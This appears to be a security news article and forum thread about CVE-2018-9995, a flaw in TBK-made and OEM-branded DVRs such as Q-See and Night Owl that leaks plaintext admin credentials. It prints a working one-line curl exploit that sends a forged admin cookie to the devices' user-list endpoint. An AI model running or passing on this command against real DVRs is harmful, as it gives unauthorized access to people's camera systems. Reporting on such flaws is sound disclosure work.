Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs

A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is is outlined in CVE-2018-9995.
The DVRs affected are manufacturer by TBK as well as OEM'd by:
- CeNova
- DVR Login
- HVR Login
- MDVR Login
- Night OWL
- Novo
- Pulnix
- QSee
- Securus
- XVR 5 in 1
The exploit, tested by IPVM, is a simple CURL command:
curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).

The plain text credentials returned from this command granted admin access to the device.
opt=user&cmd=list
Obviously they really tried hard to hide this backdoor ;)
Do they have a businesses presence in the US?

TBK is Spanish company, however OEMs like Q-see and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Coscto, and more.

05/03/18 08:31pm
Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.
Does anyone have the MAC prefix for their devices?

05/10/18 08:06pm
Manufactured by TBK, a spanish company? Are they really manufactured in a spanish country?
Those dvr’s were designed and manufactured by Streamax, China.
Newest Discussions
Discussion | Posts | Latest |
---|---|---|
Started by
Undisclosed #1
|
3
|
less than a minute by Undisclosed #3 |
Started by
Lee Jones
|
2
|
less than a minute by Undisclosed Manufacturer #1 |
Started by
Jeff Schulz
|
1
|
less than a minute by Jeff Schulz |
Started by
John Honovich
|
22
|
less than a minute by Undisclosed Integrator #5 |
Do Cloud Systems Increase Or Reduce The Need For Integrators To Be Proficient In IT And Networking?
(9)
Started by
Ryan King
|
9
|
about 2 hours by Brian Karas |